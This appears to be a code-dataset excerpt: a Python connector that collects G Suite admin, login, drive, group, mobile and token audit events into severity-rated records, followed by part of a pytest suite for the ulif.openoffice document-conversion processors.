os.path.basename(os.path.realpath(__file__))\r\nscript_directory = os.path.dirname(os.path.realpath(__file__))\r\nlib_directory = os.path.realpath(os.path.join(script_directory, '../lib'))\r\nif lib_directory not in sys.path:\r\n sys.path.append(lib_directory)\r\n\r\nfrom o_common import ENCODING, OK_STATUS, rest_client\r\nfrom o_common import logging_init, logging_level, get_dns\r\nfrom o_common import arguments_check, fix_name, json_dump, load_namespace\r\n\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n# If modifying these scopes, delete your previously saved credentials\r\n# at ~/.credentials/appsactivity-python-quickstart.json\r\nSCOPES = 'https://www.googleapis.com/auth/activity ' \\\r\n 'https://www.googleapis.com/auth/drive.metadata.readonly ' \\\r\n 'https://www.googleapis.com/auth/admin.reports.audit.readonly ' \\\r\n 'https://www.googleapis.com/auth/admin.reports.usage.readonly ' \\\r\n 'https://www.googleapis.com/auth/urlshortener ' \\\r\n 'https://www.googleapis.com/auth/cloud-platform'\r\n\r\nCLIENT_SECRET_FILE = 'client_secret.json'\r\nAPPLICATION_NAME = 'Google Suite Activity API Python Quickstart'\r\nSCOPES_URL = SCOPES\r\nTOKEN_COUNT = 1000\r\n\r\nclass ARCEO_VULN(object):\r\n # col in arceo_vulnerability\r\n connector_name = ''\r\n connector_version = ''\r\n connector_id = ''\r\n connector_type = ''\r\n computer_id = ''\r\n computer_name = ''\r\n computer_dns = ''\r\n computer_domain = ''\r\n computer_ip = '' # inet\r\n computer_port = 443 # integer\r\n computer_protocol = 'https'\r\n computer_service = ''\r\n detected_ts = '' # timestamptz\r\n released_ts = '' # timestamptz\r\n name = ''\r\n vendor = 'Google G Suite'\r\n severity = 'low'\r\n cvss = 0.0 # float8\r\n cves = ''\r\n links = ''\r\n viruses = ''\r\n is_error = 0 # boolean DEFAULT false\r\n description = ''\r\n\r\n # clear non-defaults\r\n def clear(self):\r\n self.connector_name = ''\r\n self.connector_version = ''\r\n self.connector_id = ''\r\n self.connector_type = ''\r\n self.computer_id = ''\r\n self.computer_name = ''\r\n self.computer_dns = ''\r\n self.computer_domain = ''\r\n self.computer_ip = '' # inet\r\n self.computer_service = ''\r\n self.detected_ts = '' # timestamptz\r\n self.released_ts = ''\r\n self.name = ''\r\n self.severity = 'low'\r\n self.cvss = 0.0 # float8\r\n self.cves = ''\r\n self.links = ''\r\n self.viruses = ''\r\n self.is_error = 0 # boolean DEFAULT false\r\n self.description = ''\r\n\r\n\r\ndef get_credentials(secret_file):\r\n \"\"\"Gets valid user credentials from storage.)\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n home_dir = os.path.expanduser('~')\r\n credential_dir = os.path.join(home_dir,'.credentials')\r\n\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir,'appsactivity-python-quickstart.json')\r\n\r\n store = Storage(credential_path)\r\n credentials = store.get()\r\n\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(secret_file, SCOPES)\r\n flow.user_agent = APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n print('Storing credentials to ' + credential_path)\r\n return credentials\r\n\r\n\r\ndef write_results(output_base, db_vluns):\r\n output_json = 
'./data/'+output_base + '.json'\r\n output_csv = './data/'+output_base + '.out'\r\n\r\n log.info('start writing output file: %s ...', [output_json, output_csv])\r\n\r\n with open(output_json, 'wb') as f:\r\n f.write(json_dump(db_vluns, sort_keys=False))\r\n\r\n with open(output_csv, 'wb') as f:\r\n if not db_vluns:\r\n return\r\n\r\n columns = db_vluns[0].keys()\r\n writer = csv.DictWriter(f, fieldnames=columns, extrasaction='ignore')\r\n writer.writeheader()\r\n\r\n for vlun in db_vluns:\r\n # if isinstance(v, datetime):\r\n # vlun[k] = v.isoformat()\r\n # if isinstance(v, (list, tuple)):\r\n # vlun[k] = ','.join(v)\r\n writer.writerow(vlun)\r\n\r\n log.info('finish writing output file: %s', [output_json,output_csv])\r\n\r\n\r\ndef map_out_to_arceo_vunlnerability(rows,v):\r\n rows.append({\r\n 'connector_name': v.connector_name.lower(),\r\n 'connector_version':v.connector_version.lower(),\r\n 'connector_id': v.connector_id,\r\n 'connector_type': v.connector_type.lower(),\r\n 'computer_id': v.computer_id,\r\n 'computer_name': v.computer_name.lower(),\r\n 'computer_dns': v.computer_dns,\r\n 'computer_domain': v.computer_domain.lower(),\r\n 'computer_ip': v.computer_ip, # inet\r\n 'computer_port': v.computer_port, # integer\r\n 'computer_protocol':v.computer_protocol.lower(),\r\n 'computer_service': v.computer_service.lower(),\r\n 'detected_ts': v.detected_ts, # timestamptz\r\n 'released_ts': v.released_ts, # timestamptz\r\n 'name': v.name.lower(),\r\n 'vendor': v.vendor,\r\n 'severity': v.severity.lower(),\r\n 'cvss': v.cvss, # float8\r\n 'cves': v.cves,\r\n 'links': v.links,\r\n 'viruses': v.viruses,\r\n 'is_error': v.is_error, # boolean DEFAULT false\r\n 'description': v.description.lower(),\r\n })\r\n\r\ndef gsuite_adminreportsAPI(args):\r\n\r\n credentials = get_credentials('client_secret_activity.json')\r\n\r\n log.info('visit this OAuth consent URL to allow access: %s', credentials.token_info_uri)\r\n http = credentials.authorize(httplib2.Http())\r\n\r\n # Creates a Google Admin SDK Reports API service object\r\n log.info('Building an discovery service for reports_v1')\r\n service = discovery.build('admin', 'reports_v1', http=http)\r\n log.info('Built service object for: %s', service._baseUrl)\r\n\r\n # defaults values for col in arceo_vulnerability\r\n a = ARCEO_VULN()\r\n\r\n # 1 Request Admin reports. 
- for ref see - https://developers.google.com/admin-sdk/reports/v1/reference/activities/list\r\n log.info('Fetch the last {} days of admin events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='admin',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n if not activities:\r\n log.info('NO GSuite admin events found.')\r\n else:\r\n log.info('*** Admin ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n # The admin activity report's activity events types are:\r\n # APPLICATION_SETTINGS, CALENDAR_SETTINGS, CHAT_SETTINGS, CHROME OS_SETTINGS, CONTACTS_SETTINGS\r\n # DELEGATED_ADMIN, DOCS_SETTINGS, DOMAIN_SETTINGS, EMAIL_SETTINGS, GROUP_SETTINGS, LICENSES_SETTINGS\r\n # MOBILE_SETTINGS, ORG_SETTINGS, SECURITY_SETTINGS, SITES_SETTINGS, SYSTEM_SETTINGS, USER_SETTINGS\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n a.computer_name = activity['events'][0]['name']\r\n a.name = activity['actor']['email']\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n #log.info(event)\r\n event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n # log.info(parameter)\r\n if 'ADD_NICKNAME' in event_name:\r\n # if 'EMAIL' in parameter['name']:\r\n # description = description + parameter['value'] + ' created '\r\n if 'NICKNAME' in parameter['name']:\r\n a.description = a.description + ' nickname:' + parameter['value']\r\n elif 'DOMAIN_NAME' in parameter['name']:\r\n a.computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n elif 'PLAY_FOR_WORK_MDM_VENDOR_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n try: # ipAddress can be missing for some event_types, like Google Mobile Management, that's ok.\r\n a.computer_ip = activity['ipAddress'] # inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n if a.computer_service == '':\r\n a.computer_service = event_name\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # same as detected_ts\r\n\r\n if 'security_settings' in a.connector_type:\r\n a.severity = 'mid'\r\n else:\r\n a.severity = 'low'\r\n\r\n # a.links = a.name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('admin', rows)\r\n\r\n # 2 Request Login reports\r\n log.info('Getting the last {} login events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='login',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No logins found.')\r\n else:\r\n log.info('*** Logins ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n event_name = 
activity['events'][0]['name']\r\n a.connector_name = event_name\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n a.name = activity['actor']['email']\r\n\r\n if 'login_failure' in event_name:\r\n is_error = 1\r\n # Map the severity based on the type of login_failure that occurred.\r\n if len(activity['events'][0]['parameters']) > 1:\r\n event_value = activity['events'][0]['parameters'][1]['value']\r\n log.info(event_value)\r\n if 'login_failure_access_code_disallowed' in event_value: # - The user does not have permission to login to the service.'\r\n a.severity = 'mid'\r\n a.description = 'access_code_disallowed'\r\n elif 'login_failure_account_disabled' in event_value: # - The user's account is disabled.'\r\n a.severity = 'high'\r\n a.description = 'account_disabled'\r\n elif 'login_failure_invalid_password' in event_value: # - The user's password was invalid.'\r\n a.severity = 'mid'\r\n a.description = 'invalid_password'\r\n elif 'login_failure_invalid_second_factor' in event_value: # - If two-factor authentication is enabled, the user supplied an invalid second form of identification. '\r\n a.severity = 'mid'\r\n a.description = 'invalid_second_factor'\r\n elif 'login_failure_missing_second_factor' in event_value: # - If two-factor authentication is enabled, the user did not supply a second authentication factor such as a one-time password. '\r\n a.severity = 'mid'\r\n a.description = 'missing_second_factor'\r\n elif 'login_failure_unknown' in event_value: # - The reason for the login failure is not known.'\r\n a.severity = 'high'\r\n a.description = 'failure_unknown'\r\n else:\r\n a.severity = 'high' # - We end up here only when new event_values are added by Google.\r\n a.specal_note = '- Undetermined login failure - MAINTENANCE: Check Google API for new failure values.'\r\n a.description = a.specal_note + ' ' + a.description + ' Severity:'+a.severity\r\n log.error(a.description)\r\n elif 'login_challenge' in event_name:\r\n log.info(event_name)\r\n if len(activity['events'][0]['parameters']) > 1:\r\n login_challenge_status = activity['events'][0]['parameters'][1]['value']\r\n if ('Challenge Passed') in login_challenge_status:\r\n a.is_error = 0\r\n a.severity = 'low'\r\n a.description = login_challenge_status\r\n elif 'Challenge Failed' in login_challenge_status:\r\n a.is_error = 1\r\n a.severity = 'mid'\r\n a.description = login_challenge_status\r\n else:\r\n a.is_error = 1\r\n a.severity = 'high'\r\n a.description = 'Challenge Failed unknown status'\r\n # login_challenge_status\r\n # Whether the login challenge succeeded or failed, represented as \"Challenge Passed.\" and \"Challenge Failed.\" respectively.\r\n # An empty string indicates an unknown status.\r\n else:\r\n is_error = 0\r\n if len(activity['events'][0]['parameters']) > 1:\r\n a.is_suspicious = activity['events'][0]['parameters'][1]['value']\r\n # The login attempt had some unusual characteristics, for example the user logged in from an unfamiliar IP address.\r\n if a.is_suspicious:\r\n a.is_suspicious = 1.0\r\n a.suspicious = 'Suspicious'\r\n a.severity = 'mid'\r\n else:\r\n a.is_suspicious = 0.0\r\n a.suspicious = 'Normal'\r\n a.severity = 'low'\r\n else:\r\n a.is_suspicious = 0.0\r\n a.suspicious = 'Normal'\r\n a.severity = 'low'\r\n\r\n a.description = a.suspicious + ' login activity'\r\n\r\n if a.description == '':\r\n 
a.description = event_name\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] # inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # same as detected_t\r\n a.links = a.name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('login',rows)\r\n\r\n\r\n # 3 Request GDrive reports\r\n log.info('Getting the last {} GDrive events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='drive',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No GDrive events found.')\r\n else:\r\n log.info('*** GDrive ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_type = activity['events'][0]['name']\r\n a.connector_name = activity['events'][0]['name']\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n # log.info(event)\r\n event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n # log.info(parameter)\r\n if 'DOMAIN_NAME' in parameter['name']:\r\n computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n a.computer_service = activity['kind']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] # inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # same as detected_ts\r\n\r\n a.links = activity['actor']['email']\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('drive', rows)\r\n\r\n # 4 Request Group reports\r\n log.info('Getting the last {} groups events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='groups',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No groups events found.')\r\n else:\r\n log.info('*** Groups ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['events'][0]['name']\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n #log.info(event)\r\n event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in 
event['parameters']:\r\n #log.info(parameter)\r\n if 'DOMAIN_NAME' in parameter['name']:\r\n a.computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if a.computer_service == '':\r\n a.computer_service = activity['kind']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] #inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts #same as detected_ts\r\n a.name = activity['actor']['email']\r\n # vendor =\r\n\r\n if a.description == '':\r\n a.description = event_name\r\n\r\n map_out_to_arceo_vunlnerability(rows,a)\r\n\r\n write_results('groups', rows)\r\n\r\n # 5 Request Mobile reports\r\n log.info('Getting the last {} mobile events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='mobile',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No mobile events found.')\r\n else:\r\n log.info('*** Mobile ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['events'][0]['name']\r\n a.connector_version = activity['actor']['profileId'] # perhaps NOT this here\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type = activity['events'][0]['type'] # 'DOMAIN_SETTINGS'/'SECURITY_SETTINGS'...\r\n a.computer_id = activity['id']['customerId']\r\n a.computer_service = activity['kind']\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts # timestamptz\r\n a.name = activity['actor']['email']\r\n a.description = activity['events'][0]['name']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] #inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n map_out_to_arceo_vunlnerability(rows, a)\r\n\r\n write_results('mobile', rows)\r\n\r\n #6 Request OAuth Token reports\r\n log.info('Getting the last {} token events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='token',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n\r\n if not activities:\r\n log.info('No OAuth token events found.')\r\n else:\r\n log.info('*** OAuth Tokens ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_type = activity['id']['applicationName'] # 'token'...\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n a.connector_type.lower\r\n a.computer_id = activity['id']['customerId']\r\n a.computer_service = activity['kind']\r\n\r\n try: # ipAddress can be missing for some event_types\r\n a.computer_ip = activity['ipAddress'] #inet\r\n if a.computer_id != '':\r\n a.computer_dns = get_dns(a.computer_ip)\r\n except:\r\n log.info('Info ipAddress = %s',a.computer_ip)\r\n\r\n a.detected_ts = activity['id']['time'] # timestamptz\r\n a.released_ts = a.detected_ts #same as 
detected_ts\r\n a.name = activity['actor']['email']\r\n # currently we/Google only support 1 event per activity\r\n for event in activity['events']:\r\n #log.info(event)\r\n #event_name = event['name']\r\n\r\n try: # we don't always have 'parameters'\r\n for parameter in event['parameters']:\r\n #log.info(parameter)\r\n if 'app_name' in parameter['name']:\r\n app_name = parameter['value']\r\n if 'DOMAIN_NAME' in parameter['name']:\r\n a.computer_domain = parameter['value']\r\n elif 'SERVICE_NAME' in parameter['name']:\r\n a.computer_service = parameter['value']\r\n else:\r\n a.description = a.description + parameter['name'] + ':' + parameter['value'] + ','\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if app_name != '':\r\n a.description = app_name\r\n\r\n if 'authorize' in a.connector_name:\r\n a.severity = 'low'\r\n\r\n if a.description == '':\r\n a.description = activity['events'][0]['name']\r\n\r\n map_out_to_arceo_vunlnerability(rows, a)\r\n\r\n write_results('tokens', rows)\r\n\r\n\r\ndef gsuite_activityAPI():\r\n \"\"\"Shows basic usage of the G Suite Activity API.\"\"\"\r\n credentials = get_credentials(CLIENT_SECRET_FILE)\r\n http = credentials.authorize(httplib2.Http())\r\n\r\n \"\"\" create an service object with build() construction, is specific to the given API \"\"\"\r\n service = discovery.build('appsactivity', 'v1', http=http)\r\n\r\n \"\"\"Creates a G Suite Activity API service object and outputs the recent activity in your Google Drive.\"\"\"\r\n results = service.activities().list(source='drive.google.com',\r\n drive_ancestorId='root', pageSize=10).execute()\r\n # defaults values for col in arceo_vulnerability\r\n a = ARCEO_VULN()\r\n\r\n activities = results.get('activities', [])\r\n if not activities:\r\n log.info('No activity.')\r\n else:\r\n log.info('Recent GDrive activity:')\r\n rows = []\r\n\r\n for activity in activities:\r\n a.clear()\r\n\r\n event = activity['combinedEvent']\r\n user = event.get('user', None)\r\n target = event.get('target', None)\r\n if user == None or target == None:\r\n continue\r\n\r\n try:\r\n a.connector_name = 'GDrive'\r\n a.connector_type = event['primaryEventType']\r\n a.connector_type.lower()\r\n a.connector_id = target['id']\r\n a.computer_name = target['name'] # is fname\r\n a.computer_service = target['mimeType']\r\n a.name = user['name']\r\n a.computer_id = user['permissionId']\r\n time = datetime.datetime.fromtimestamp(int(event['eventTimeMillis'])/1000)\r\n a.detected_ts = time\r\n a.released_ts = a.detected_ts # same as detect ed_ts\r\n\r\n log.info('{0}: {1}, {2}, {3} ({4})'.format(time, user['name'],\r\n event['primaryEventType'], target['name'], target['mimeType']))\r\n\r\n except:\r\n iparams = 0;\r\n\r\n if a.description == '':\r\n a.description = a.name + ' ' + a.connector_type + ' ' + a.computer_name + '(' + a.computer_service + ')'\r\n\r\n map_out_to_arceo_vunlnerability(rows, a)\r\n\r\n write_results('gdrive', rows)\r\n\r\n\r\ndef parse_arguments(argv):\r\n parser = ArgumentParser(description='Collects Metrics from Google Google-Suite.',\r\n formatter_class= ArgumentDefaultsHelpFormatter, add_help=False)\r\n parser.add_argument('-?', '--help', action='help', help='Show Help Message And Exit', default=AP_SUPPRESS)\r\n parser.add_argument('-v', '--verbose', action='store_true', help='Enable Debug Logging')\r\n parser.add_argument('-s', '--scopes-url', default=SCOPES_URL, help='SCOPES URL')\r\n parser.add_argument('-t', '--token-count', default=TOKEN_COUNT, help='Event Count')\r\n parser.add_argument('-k', '--key', 
help='Application Key')\r\n namespace = load_namespace(parser, os.environ.get('PREFIX', 'GSUITE'))\r\n args = parser.parse_args(argv, namespace)\r\n\r\n #arguments_check(args, ['domin', 'key'])\r\n\r\n return args\r\n\r\n\r\ndef main(argv=None):\r\n logging_init(script_name, 'google-suite', facility='local4', stream=sys.stdout)\r\n args = parse_arguments(argv)\r\n logging_level(args)\r\n\r\n gsuite_adminreportsAPI(args)\r\n gsuite_activityAPI()\r\n\r\n return 0\r\n\r\n\r\n# Starting point\r\nif __name__ == '__main__':\r\n sys.exit(main())","repo_name":"tedry/googlesuite","sub_path":"googlesuite/google_suite_connector.py","file_name":"google_suite_connector.py","file_ext":"py","file_size_in_byte":30512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25508391290","text":"import codecs\nimport os\nimport pytest\nimport shutil\nimport tempfile\nimport zipfile\nfrom argparse import ArgumentParser\nfrom ulif.openoffice.options import ArgumentParserError, Options\nfrom ulif.openoffice.processor import (\n BaseProcessor, MetaProcessor, OOConvProcessor, UnzipProcessor,\n ZipProcessor, Tidy, CSSCleaner, HTMLCleaner, Error, processor_order)\nfrom ulif.openoffice.testing import (\n TestOOServerSetup, ConvertLogCatcher, envpath_wo_virtualenvs)\n\n\ndef get_unoconv_version():\n workdir = tempfile.mkdtemp()\n output_path = os.path.join(workdir, 'output')\n os.system('unoconv --version > %s' % output_path)\n output = open(output_path, 'r').readlines()\n if not output:\n # in virtualenvs we might be unable to run unoconv.\n # The workaround will retry with $PATH from special helper function.\n old_env = os.getenv(\"PATH\")\n new_env = envpath_wo_virtualenvs()\n os.environ[\"PATH\"] = new_env\n os.system('unoconv --version > %s' % output_path)\n os.environ[\"PATH\"] = old_env\n output = open(output_path, 'r').readlines()\n version = output[0].split()[-1].split('.')\n shutil.rmtree(workdir)\n return tuple(version)\nUNOCONV_VERSION = get_unoconv_version()\n\n\nclass TestProcessorHelpers(object):\n\n def test_processor_order_valid(self):\n assert processor_order('unzip, zip') == ('unzip', 'zip')\n assert processor_order('zip, unzip') == ('zip', 'unzip')\n assert processor_order('zip') == ('zip', )\n assert processor_order(',,,') == ()\n assert processor_order('') == ()\n\n def test_processor_order_invalid(self):\n # we do accept only valid processor names\n with pytest.raises(ValueError):\n processor_order('unzip, invalid, zip')\n\n\nclass TestBaseProcessor(object):\n\n def test_process_raises_not_implemented(self):\n # make sure a call to process raises something\n proc = BaseProcessor()\n with pytest.raises(NotImplementedError):\n proc.process(None, None)\n\n def test_args(self):\n # each processor should provide an arparser compatible list of\n # acceptable args that can be fed to argparsers.\n proc = BaseProcessor()\n assert proc.args == []\n\n\nclass TestMetaProcessor(object):\n\n def test_no_options(self):\n # We cope with no options set\n proc = MetaProcessor()\n assert 'meta_processor_order' in proc.options.keys()\n\n def test_ignored_options(self):\n # We ignore keys not in default dict\n proc = MetaProcessor(options={'meta-foo': '12'})\n assert 'meta-foo' not in proc.options.keys()\n\n def test_non_meta_options(self):\n # We ignore options not determined for the meta processor\n proc = MetaProcessor(options={'foo.bar': '12'})\n assert 'bar' not in proc.options.keys()\n\n def test_option_set(self):\n # We respect options set if available 
in the defaults dict\n proc = MetaProcessor(options={'meta-procord': 'oocp,oocp'})\n assert proc.options['meta_processor_order'] == ('oocp', 'oocp')\n\n def test_options_as_strings(self):\n proc = MetaProcessor(options={'meta.procord': 'oocp, oocp'})\n result = proc.get_options_as_string()\n assert result == (\n \"css_cleaner_minified=True\"\n \"css_cleaner_prettify_html=False\"\n \"html_cleaner_fix_heading_numbers=True\"\n \"html_cleaner_fix_image_links=True\"\n \"html_cleaner_fix_sd_fields=True\"\n \"meta_processor_order=('unzip', 'oocp', 'tidy', 'html_cleaner', \"\n \"'css_cleaner', 'zip')\"\n \"oocp_hostname=localhost\"\n \"oocp_output_format=html\"\n \"oocp_pdf_tagged=False\"\n \"oocp_pdf_version=False\"\n \"oocp_port=2002\"\n )\n\n def test_options_invalid(self):\n # Make sure that invalid options lead to exceptions\n with pytest.raises(ArgumentParserError):\n MetaProcessor(options={'meta-procord': 'oop,nonsense'})\n\n def test_avail_processors(self):\n # Make sure processors defined via entry points are found\n proc = MetaProcessor(options={'meta-procord': 'oocp, oocp'})\n assert proc.avail_procs['oocp'] is OOConvProcessor\n assert len(proc.avail_procs.items()) > 0\n\n def test_build_pipeline_single(self):\n proc = MetaProcessor(options={'meta-procord': 'oocp'})\n result = proc._build_pipeline()\n assert result == (OOConvProcessor,)\n\n def test_build_pipeline_twoitems(self):\n proc = MetaProcessor(options={'meta-procord': 'oocp, oocp'})\n result = proc._build_pipeline()\n assert result == (OOConvProcessor, OOConvProcessor)\n\n def test_build_pipeline_empty(self):\n proc = MetaProcessor(options={'meta-procord': ''})\n result = proc._build_pipeline()\n assert result == ()\n\n def test_build_pipeline_empty_elements(self):\n proc = MetaProcessor(options={'meta-procord': 'oocp,,,oocp'})\n result = proc._build_pipeline()\n assert result == (OOConvProcessor, OOConvProcessor)\n\n def test_process_default(self, workdir):\n proc = MetaProcessor(options={})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.txt\"))\n assert metadata['error'] is False and metadata['oocp_status'] == 0\n assert resultpath.endswith('sample.html.zip')\n\n def test_process_xhtml_unzipped(self, workdir):\n proc = MetaProcessor(options={'oocp-out-fmt': 'xhtml',\n 'meta-procord': 'unzip,oocp'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.txt\"))\n assert os.path.isfile(resultpath)\n assert metadata['error'] is False and metadata['oocp_status'] == 0\n assert open(resultpath, 'r').read().startswith('1' in content\n assert b'A' in content\n\n def test_process_pdf_as_non_pda(self):\n # make sure we can produce non-PDF/A output\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'pdf',\n 'oocp-pdf-version': '0',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n self.result_path, meta = proc.process(sample_file, {})\n assert meta['oocp_status'] == 0\n assert b'xmlns:pdf=\"http://ns.adobe.com/pdf/1.3/\"' not in open(\n self.result_path, 'rb').read()\n\n def test_process_pdf_tagged(self):\n # make sure we can produce non-PDF/A output\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'pdf',\n 'oocp-pdf-tagged': '1',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n self.result_path, meta = proc.process(sample_file, {})\n assert meta['oocp_status'] == 0\n assert b'xmlns:pdf=\"http://ns.adobe.com/pdf/1.3/\"' not in 
open(\n self.result_path, 'rb').read()\n\n @pytest.mark.skipif(\"not os.environ.get('PATH', None)\")\n def test_failing_op(self):\n proc = OOConvProcessor(Options())\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n with self.failing_unoconv_context():\n # the fake unoconv will return error unconditionally\n self.result_path, meta = proc.process(sample_file, Options())\n assert meta['oocp_status'] == 1\n assert self.result_path is None\n return\n\n def test_pdf_props_wo_pdf_out(self):\n # PDF props are set only when pdf output format is required\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'html',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n log_catcher = ConvertLogCatcher()\n self.result_path, meta = proc.process(sample_file, {})\n output = log_catcher.get_log_messages()\n assert '-e SelectPdfVersion' not in output\n\n def test_pdf_props_with_pdf_out(self):\n # PDF props are set only when pdf output format is required\n proc = OOConvProcessor(\n options={\n 'oocp-out-fmt': 'pdf',\n }\n )\n sample_file = os.path.join(self.workdir, 'sample.txt')\n with open(sample_file, 'w') as fd:\n fd.write('A sample')\n log_catcher = ConvertLogCatcher()\n self.result_path, meta = proc.process(sample_file, {})\n output = log_catcher.get_log_messages()\n assert '-e SelectPdfVersion' in 